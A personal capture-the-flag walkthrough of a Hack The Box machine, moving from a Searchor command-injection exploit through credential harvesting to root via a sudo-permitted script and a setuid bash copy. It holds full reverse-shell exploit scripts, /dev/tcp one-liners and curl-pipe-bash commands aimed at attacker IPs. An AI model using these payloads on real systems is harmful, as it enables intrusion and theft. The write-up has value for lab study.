```
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 19:38 EDT
Nmap scan report for 10.10.11.208
Host is up (0.025s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.52
Service Info: Host: searcher.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.08 seconds
```

```
gobuster dir -u http://searcher.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

found: /search

gobuster dir -u http://searcher.htb/search/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

found: nothing
```

nothing is being found..... im going to scan UDP ports see if anything is there:
```
sudo nmap -sU -Pn --top-ports 100 -T3 10.10.11.208
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-30 19:54 EDT
Nmap scan report for searcher.htb (10.10.11.208)
Host is up (0.024s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT   STATE         SERVICE
68/udp open|filtered dhcpc

Nmap done: 1 IP address (1 host up) scanned in 107.82 seconds

```
OOOO
but it is filtered so this will be a last resort.....

I checked back at the website:

and sent the post request to the repeater, 

i saw if i add a ' character to the query parameter that i wasnt getting the response i expected:
```
engine=Google&query=pwned

translates to:
https://www.google.com/search?q=pwned

but if i do:
engine=Google&query=pwned'

i get nothing just a 200
```
hmmmmm, possible server side injection????

Lets try out some other things:
```
pwned'%2bprint('pwned')%2b
```

still nothing just a 200....

not to good at injecting, im gonna look for a vuln to :
`Powered by [Flask](https://flask.palletsprojects.com) and [Searchor 2.4.0](https://github.com/ArjunSharda/Searchor)`

as this is at the bottom of the home page:
`searchsploit searchor`

nothing.....

let me google....

pays to keep digging!
https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection

this is exactly the version running and was the first thing to pop up lol

check the code to make sure im not getting hacked myself by hacking htb...
```
#!/bin/bash -

default_port="9001"
port="${3:-$default_port}"
rev_shell_b64=$(echo -ne "bash  -c 'bash -i >& /dev/tcp/$2/${port} 0>&1'" | base64)
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) # junky comment"
plus="+"

echo "---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---"

if [ -z "${evil_cmd##*$plus*}" ]
then
    evil_cmd=$(echo ${evil_cmd} | sed -r 's/[+]+/%2B/g')
fi

if [ $# -ne 0 ]
then
    echo "[*] Input target is $1"
    echo "[*] Input attacker is $2:${port}"
    echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
    curl -s -X POST $1/search -d "engine=Google&query=${evil_cmd}" 1> /dev/null
else 
    echo "[!] Please specify a IP address of target and IP address/Port of attacker for Reverse Shell, for example: 

./exploit.sh <TARGET> <ATTACKER> <PORT> [9001 by default]"
fi
```

CLEAN!

lets send it :
```
./searchor.sh 10.10.11.208 10.10.14.3
---[Reverse Shell Exploit for Searchor <= 2.4.2 (2.4.0)]---
[*] Input target is 10.10.11.208
[*] Input attacker is 10.10.14.3:9001
[*] Run the Reverse Shell... Press Ctrl+C after successful connection
```

Didn't work, so i went back in the website and was messing around, looks like it needs to be URL-encoded for it to work, so i just made things simple and used my own code that i took from our boy above, shout out him:
```
#!/bin/bash -

rev_shell_b64=$(echo -ne "bash -i >& /dev/tcp/10.10.14.3/9001 0>&1" | base64)
evil_cmd="',__import__('os').system('echo ${rev_shell_b64}|base64 -d|bash -i')) #"
url_encoded_cmd=$(python3 -c "import urllib.parse; print(urllib.parse.quote(\"${evil_cmd}\"))")

echo "[*] Run the Reverse Shell... Press Ctrl+C after successful connection"
curl -s -X POST http://searcher.htb/search -d "engine=Google&query=${url_encoded_cmd}"
```

:D

```
svc@busqueda:~$ cat user.txt
cat user.txt
c43f6be03dc7e0f171c552****
```

USER PWNED!
*Took a lil longer than expected but lets be real this was for sure the exploit, so i was for sure going down this bunny hole*

---

### PRIV ESC

`whoami`
`svc`

`find / -perm -4000 -type f 2>/dev/null`
```
/usr/libexec/polkit-agent-helper-1
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/newgrp
/usr/bin/mount
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/umount
/usr/bin/fusermount3
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/snap/core20/1822/usr/bin/chfn
/snap/core20/1822/usr/bin/chsh
/snap/core20/1822/usr/bin/gpasswd
/snap/core20/1822/usr/bin/mount
/snap/core20/1822/usr/bin/newgrp
/snap/core20/1822/usr/bin/passwd
/snap/core20/1822/usr/bin/su
/snap/core20/1822/usr/bin/sudo
/snap/core20/1822/usr/bin/umount
/snap/core20/1822/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1822/usr/lib/openssh/ssh-keysign
/snap/snapd/18357/usr/lib/snapd/snap-confine
```

that snapd stands out as i have seen it been vuln before.... we need to find host version as if it is <2.37 we should be able to exploit:
```
searchsploit snapd          
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (1)                | linux/local/46361.py
snapd < 2.37 (Ubuntu) - 'dirty_sock' Local Privilege Escalation (2)                | linux/local/46362.py
```

```
cat /etc/os-release
PRETTY_NAME="Ubuntu 22.04.2 LTS"
NAME="Ubuntu"
VERSION_ID="22.04"
VERSION="22.04.2 LTS (Jammy Jellyfish)"
VERSION_CODENAME=jammy
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=jammy
```

lets double check:
`snap version`
```
snap    2.58.2
snapd   2.58.2
series  16
ubuntu  22.04
kernel  5.15.0-69-generic
```

welp this is 99% not it so lets move on...

im gonna upload linpeas.sh

a lot to look at but here are some interesting things:
```
env vars:
LESSOPEN=| /usr/bin/lesspipe %s
pm_out_log_path=/root/.pm2/logs/app-out.log
app={}
USER=root
restart_time=0
PM2_USAGE=CLI
SHLVL=2
gid=1000
HOME=/home/svc
username=root
OLDPWD=/home
PM2_HOME=/root/.pm2
PM2_INTERACTOR_PROCESSING=true
created_at=1754244951397
PYTHONUNBUFFERED=1
pm_cwd=/var/www/app
namespace=default
uid=1000
WERKZEUG_SERVER_FD=4
pm_exec_path=/var/www/app/app.py
unstable_restarts=0
pm_id=0
kill_retry_time=100
LOGNAME=root
node_args=
_=./linpeas.sh
exec_mode=fork_mode
NODE_APP_INSTANCE=0
axm_monitor=[object Object]
windowsHide=true
status=launching
exec_interpreter=python3
axm_options=[object Object]
axm_dynamic=[object Object]
LANG=en_US.UTF-8
vizion=true
pm_pid_path=/root/.pm2/pids/app-0.pid
pm_err_log_path=/root/.pm2/logs/app-error.log
treekill=true
PM2_JSON_PROCESSING=true
SHELL=/bin/sh
pmx=true
unique_id=791b761f-cc4b-4b5e-a1ce-3873a1d7113d
NODE_CHANNEL_SERIALIZATION_MODE=json
automation=true
LESSCLOSE=/usr/bin/lesspipe %s %s
vizion_running=false
cwd=/var/www/app
instance_var=NODE_APP_INSTANCE
name=app
PWD=/home/svc
env=[object Object]
PIDFILE=/root/.pm2/pm2.pid
km_link=false
instances=1
axm_actions=
merge_logs=true
NODE_CHANNEL_FD=3
autorestart=true
pm_uptime=1754244951397
```
based on those vars:
```
/etc/.pm2/pub.sock
  └─(Read Execute )
  └─(Owned by root)
/etc/.pm2/rpc.sock
  └─(Read Execute )
  └─(Owned by root)
```

found a user cody:
```
[user]
	email = cody@searcher.htb
	name = cody
```

there is a lot there, lets go back and check out the application running as in env vars we can see root and /var/www/app.... have no idea if this is right so just gonna do a quick search and see if anything sticks out:
found a .git:
```
/var/www/app$ ls -la
ls -la
total 20
drwxr-xr-x 4 www-data www-data 4096 Apr  3  2023 .
drwxr-xr-x 4 root     root     4096 Apr  4  2023 ..
-rw-r--r-- 1 www-data www-data 1124 Dec  1  2022 app.py
drwxr-xr-x 8 www-data www-data 4096 Aug  3 18:15 .git
drwxr-xr-x 2 www-data www-data 4096 Dec  1  2022 templates
```

lets look inside:
```
ls .git
branches
COMMIT_EDITMSG
config
description
HEAD
hooks
index
info
logs
objects
refs
```

lets check logs and config right off the rip:
```
cat .git/config
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "main"]
	remote = origin
	merge = refs/heads/main
```

wow some creds right there for the user we found above.... crazy:
`cody:jh1usoih2bkjaspwe92`

now looks like they are using gitea.....
but first now that we have creds lets use them to sudo -l
```
jh1usoih2bkjaspwe92
Matching Defaults entries for svc on busqueda:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User svc may run the following commands on busqueda:
    (root) /usr/bin/python3 /opt/scripts/system-checkup.py *
```

well well well...

im thinking off the rip no way we have write access here, but maybe now that we have cody's creds we can overwrite this in his gitea and then pull it and bang it will be our update rev shell which will run as root and sys will be PWNED!... lets get to work!

im gonna add this gitea.searcher.htb to my etc/hosts and try to access it:
![[Pasted image 20250803150504.png]]

worked!
Now lets try and use cody's creds here on the login page.

im in as cody....

![[Pasted image 20250803150825.png]]

but let me think cause if sudo -l worked with cody's password and i am running as svc... let me chec this `/opt/scripts/system-checkup.py *`

not sure but looks like this must do some check on any file and it will run as root...

```
ls -la /opt/scripts
total 28
drwxr-xr-x 3 root root 4096 Dec 24  2022 .
drwxr-xr-x 4 root root 4096 Mar  1  2023 ..
-rwx--x--x 1 root root  586 Dec 24  2022 check-ports.py
-rwx--x--x 1 root root  857 Dec 24  2022 full-checkup.sh
drwxr-x--- 8 root root 4096 Apr  3  2023 .git
-rwx--x--x 1 root root 3346 Dec 24  2022 install-flask.sh
-rwx--x--x 1 root root 1903 Dec 24  2022 system-checkup.py
```

```
sudo cat /opt/scripts/system-checkup.py
sudo cat /opt/scripts/system-checkup.py
Sorry, user svc is not allowed to execute '/usr/bin/cat /opt/scripts/system-checkup.py' as root on busqueda.
```

hmmmm lets just run this with some random value after and see if it gives us any hints as too wtf this does:
```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py test
<usr/bin/python3 /opt/scripts/system-checkup.py test
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
```
ok this is interesting...

again from the above there is a .git so maybe it too is in this gittea...

nothing i can see in the gitea at all.....

first though lets list this:
`sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps`
```
CONTAINER ID   IMAGE                COMMAND                  CREATED       STATUS             PORTS                                             NAMES
960873171e2e   gitea/gitea:latest   "/usr/bin/entrypoint…"   2 years ago   Up About an hour   127.0.0.1:3000->3000/tcp, 127.0.0.1:222->22/tcp   gitea
f84a6b33fb5a   mysql:8              "docker-entrypoint.s…"   2 years ago   Up About an hour   127.0.0.1:3306->3306/tcp, 33060/tcp               mysql_db
```

mysql is running..... 

```
svc@busqueda:/var/www/app$ mysql -h 127.0.0.1 -P 3306 -u root -p
mysql -h 127.0.0.1 -P 3306 -u root -p
Enter password: jh1usoih2bkjaspwe92
ERROR 1045 (28000): Access denied for user 'root'@'172.19.0.1' (using password: YES)
svc@busqueda:/var/www/app$ mysql -h 127.0.0.1 -P 3306 -u cody -p     
mysql -h 127.0.0.1 -P 3306 -u cody -p
Enter password: jh1usoih2bkjaspwe92                  
ERROR 1045 (28000): Access denied for user 'cody'@'172.19.0.1' (using password: YES)
```

none worked....

gonna be honest i am just gonna try and hijack this as is, this could be all wrong but i have really run out of enum here, least i think:
```
mkdir /tmp/pwn
echo 'import os; os.system("bash -i >& /dev/tcp/10.10.14.11/9003 0>&1")' > /tmp/pwn/docker.py
```

but nothing....
```
sudo PYTHONPATH=/tmp/pwn /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
<in/python3 /opt/scripts/system-checkup.py docker-ps

sudo: sorry, you are not allowed to set the following environment variables: PYTHONPATH
```

hmm let me try this:
```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py ';bash -i >& /dev/tcp/10.10.14.11/9004 0>&1;'
```

```
svc@busqueda:/var/www/app$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py ';bash -i >& /dev/tcp/10.10.14.11/9004 0>&1;'
<up.py ';bash -i >& /dev/tcp/10.10.14.11/9004 0>&1;'
Usage: /opt/scripts/system-checkup.py <action> (arg1) (arg2)

     docker-ps     : List running docker containers
     docker-inspect : Inpect a certain docker container
     full-checkup  : Run a full system checkup
```

nothing again.....
`sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup; echo $PATH`
```
[=] Docker conteainers
{
  "/gitea": "running"
}
{
  "/mysql_db": "running"
}

[=] Docker port mappings
{
  "22/tcp": [
    {
      "HostIp": "127.0.0.1",
      "HostPort": "222"
    }
  ],
  "3000/tcp": [
    {
      "HostIp": "127.0.0.1",
      "HostPort": "3000"
    }
  ]
}

[=] Apache webhosts
[+] searcher.htb is up
[+] gitea.searcher.htb is up

[=] PM2 processes
┌─────┬────────┬─────────────┬─────────┬─────────┬──────────┬────────┬──────┬───────────┬──────────┬──────────┬──────────┬──────────┐
│ id  │ name   │ namespace   │ version │ mode    │ pid      │ uptime │ ↺    │ status    │ cpu      │ mem      │ user     │ watching │
├─────┼────────┼─────────────┼─────────┼─────────┼──────────┼────────┼──────┼───────────┼──────────┼──────────┼──────────┼──────────┤
│ 0   │ app    │ default     │ N/A     │ fork    │ 1555     │ 82m    │ 0    │ online    │ 0%       │ 18.3mb   │ svc      │ disabled │
└─────┴────────┴─────────────┴─────────┴─────────┴──────────┴────────┴──────┴───────────┴──────────┴──────────┴──────────┴──────────┘

[+] Done!
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin:/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
```

hmmm 
`sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .}}' gitea | jq .`
```
<checkup.py docker-inspect '{{json .}}' gitea | jq .
{
  "Id": "960873171e2e2058f2ac106ea9bfe5d7c737e8ebd358a39d2dd91548afd0ddeb",
  "Created": "2023-01-06T17:26:54.457090149Z",
  "Path": "/usr/bin/entrypoint",
...
    },
    "Name": "overlay2"
  },
  "Mounts": [
    {
      "Type": "bind",
      "Source": "/root/scripts/docker/gitea",
      "Destination": "/data",
      "Mode": "rw",
      "RW": true,
      "Propagation": "rprivate"
    },
    {
      "Type": "bind",
      "Source": "/etc/localtime",
      "Destination": "/etc/localtime",
      "Mode": "ro",
      "RW": false,
      "Propagation": "rprivate"
    },
    {
      "Type": "bind",
      "Source": "/etc/timezone",
      "Destination": "/etc/timezone",
      "Mode": "ro",
      "RW": false,
      "Propagation": "rprivate"
    }
  ],
  "Config": {
    "Hostname": "960873171e2e",
    "Domainname": "",
    "User": "",
    "AttachStdin": false,
    "AttachStdout": false,
    "AttachStderr": false,
    "ExposedPorts": {
      "22/tcp": {},
      "3000/tcp": {}
    },
    "Tty": false,
    "OpenStdin": false,
    "StdinOnce": false,
    "Env": [
      "USER_UID=115",
      "USER_GID=121",
      "GITEA__database__DB_TYPE=mysql",
      "GITEA__database__HOST=db:3306",
      "GITEA__database__NAME=gitea",
      "GITEA__database__USER=gitea",
      "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
      "USER=git",
      "GITEA_CUSTOM=/data/gitea"
    ],
    "Cmd": [
      "/bin/s6-svscan",
      "/etc/s6"
    ],
    "Image": "gitea/gitea:latest",
    "Volumes": {
      "/data": {},
      "/etc/localtime": {},
      "/etc/timezone": {}
    },
    "WorkingDir": "",
    "Entrypoint": [
      "/usr/bin/entrypoint"
    ],
    "OnBuild": null,
    "Labels": {

```

creds:
`gitea:yuiu1hoiu4i5ho1uh`

```
mysql -h 127.0.0.1 -P 3306 -u gitea -p
Enter password: yuiu1hoiu4i5ho1uh
```

this is hanging and not working... wtf but i see the mysql running.... maybe it is on a weird port or like on an external machine?
ah-ha!
`"IPAddress": "172.19.0.2",`

lets try this:
`mysql -h 172.19.0.2 -P 3306 -u gitea -p`

that didnt work, wtf says not running... maybe this is wrong ip?
```
sudo python3 /opt/scripts/system-checkup.py docker-inspect '{{json .NetworkSettings.Networks}}' mysql_db | jq .
<{{json .NetworkSettings.Networks}}' mysql_db | jq .
{
  "docker_gitea": {
    "IPAMConfig": null,
    "Links": null,
    "Aliases": [
      "f84a6b33fb5a",
      "db"
    ],
    "NetworkID": "cbf2c5ce8e95a3b760af27c64eb2b7cdaa71a45b2e35e6e03e2091fc14160227",
    "EndpointID": "607a35f379d1c5b9c5ea43514effc7b77aec8677ee65efd9173a9ad137bc4fad",
    "Gateway": "172.19.0.1",
    "IPAddress": "172.19.0.3",
    "IPPrefixLen": 16,
    "IPv6Gateway": "",
    "GlobalIPv6Address": "",
    "GlobalIPv6PrefixLen": 0,
    "MacAddress": "02:42:ac:13:00:03",
    "DriverOpts": null
  }
}
```

ok now lets try with this ip:
````
mysql -h 172.19.0.3 -u gitea -pyuiu1hoiu4i5ho1uh gitea
````

just hangs....

im gonna try this pass in gitea as we know we need access to those scripts in /opt/scripts and we know there is a git repo for them because of the .git dir in there, cody just doesnt have access:
![[Pasted image 20250803161835.png]]

wow not gonna lie did not expect that to happen, tried 4 users:
gitea, root, admin and administrator 

administrator worked! and i should have known to try earlier as we know there was a user named administrator as he or she made the initial commit to cody's web app repo!

before we get too feep on that lets look at the files lol:

full checkup:

```
#!/bin/bash

/usr/bin/echo '[=] Docker conteainers'

/usr/bin/docker ps -s -q|/usr/bin/xargs -I {} /usr/bin/docker inspect --format='{ {{json .Name}} : {{json .State.Status}} }' {}|/usr/bin/jq

/usr/bin/echo ''

/usr/bin/echo '[=] Docker port mappings'

/usr/bin/docker inspect gitea --format='{{json .NetworkSettings.Ports}}'|/usr/bin/jq

/usr/bin/echo ''

#!/bin/bash

/usr/bin/echo '[=] Apache webhosts'

/usr/bin/wget http://searcher.htb/ -T 3 -O /dev/null -q

if [[ $? -eq "0" ]]; then

/usr/bin/echo '[+] searcher.htb is up'

else

/usr/bin/echo '[-] searcher.htb is down'

fi

/usr/bin/wget http://gitea.searcher.htb/ -T 3 -O /dev/null -q

if [[ $? -eq "0" ]]; then

/usr/bin/echo '[+] gitea.searcher.htb is up'

else

/usr/bin/echo '[-] gitea.searcher.htb is down'

fi

/usr/bin/echo ''

/usr/bin/echo '[=] PM2 processes'

/usr/local/bin/pm2 list
```

system-checkup:

```
#!/bin/bash

import subprocess

import sys

actions = ['full-checkup', 'docker-ps','docker-inspect']

def run_command(arg_list):

r = subprocess.run(arg_list, capture_output=True)

if r.stderr:

output = r.stderr.decode()

else:

output = r.stdout.decode()

return output

def process_action(action):

if action == 'docker-inspect':

try:

_format = sys.argv[2]

if len(_format) == 0:

print(f"Format can't be empty")

exit(1)

container = sys.argv[3]

arg_list = ['docker', 'inspect', '--format', _format, container]

print(run_command(arg_list))

except IndexError:

print(f"Usage: {sys.argv[0]} docker-inspect <format> <container_name>")

exit(1)

except Exception as e:

print('Something went wrong')

exit(1)

elif action == 'docker-ps':

try:

arg_list = ['docker', 'ps']

print(run_command(arg_list))

except:

print('Something went wrong')

exit(1)

elif action == 'full-checkup':

try:

arg_list = ['./full-checkup.sh']

print(run_command(arg_list))

print('[+] Done!')

except:

print('Something went wrong')

exit(1)

if __name__ == '__main__':

try:

action = sys.argv[1]

if action in actions:

process_action(action)

else:

raise IndexError

except IndexError:

print(f'Usage: {sys.argv[0]} <action> (arg1) (arg2)')

print('')

print(' docker-ps : List running docker containers')

print(' docker-inspect : Inpect a certain docker container')

print(' full-checkup : Run a full system checkup')

print('')

exit(1)
```

this is not formated correctly here obv, but we can still read the code....

looks like here the format param is not sanitized whatsoever:
```
_format = sys.argv[2]
...
arg_list = ['docker', 'inspect', '--format', _format, container]
print(run_command(arg_list))
```

lets try to pass a shell:
```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{.State.Status}}{{printf "%s" "`bash -c '\''bash -i >& /dev/tcp/10.10.14.11/9026 0>&1'\''"`}}' gitea
```

```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{.State.Status}}{{printf "%s" "`bash -c '\''bash -i >& /dev/tcp/10.10.14.11/9026 0>&1'\''"`}}' gitea
<-i >& /dev/tcp/10.10.14.11/9026 0>&1'\''"`}}' gitea
template parsing error: template: :1: unterminated raw quoted string

svc@busqueda:/var/www/app$ 
```

lets try encoding it as this seems to be figity...
`echo -n 'bash -i >& /dev/tcp/10.10.14.11/9026 0>&1' | base64`

`YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMS85MDI2IDA+JjE=`

```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{printf "%s" "`echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4xMS85MDI2IDA+JjE= | base64 -d | bash`"}}' gitea
```
AND ! 

runs but i dont catch shell....

lets try have it download and execute to even see if this is running like we expect:

```
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{printf "%s" "`curl http://10.10.14.11/shell.sh | bash`"}}' gitea
```
hmmm lets try this:
 since in the code pasted above it will run full-checkup anywhere as long as it is named fullcheckup.sh, i can write a shell there and pop it:
 in svc home dir:
  ```
 echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/rootme\nchmod 4777 /tmp/rootme' > full-checkup.sh
```

`chmod +x full-checkup.sh`

`svc@busqueda:~$ sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup`

notice i am running the full-checkup from my home dir(svc)

```
<python3 /opt/scripts/system-checkup.py full-checkup

[+] Done!
```

looks promising but the final step:

`/tmp/rootme -p`

`cat /root/root.txt`
`ab3f8f261c2b6******`

PWNED!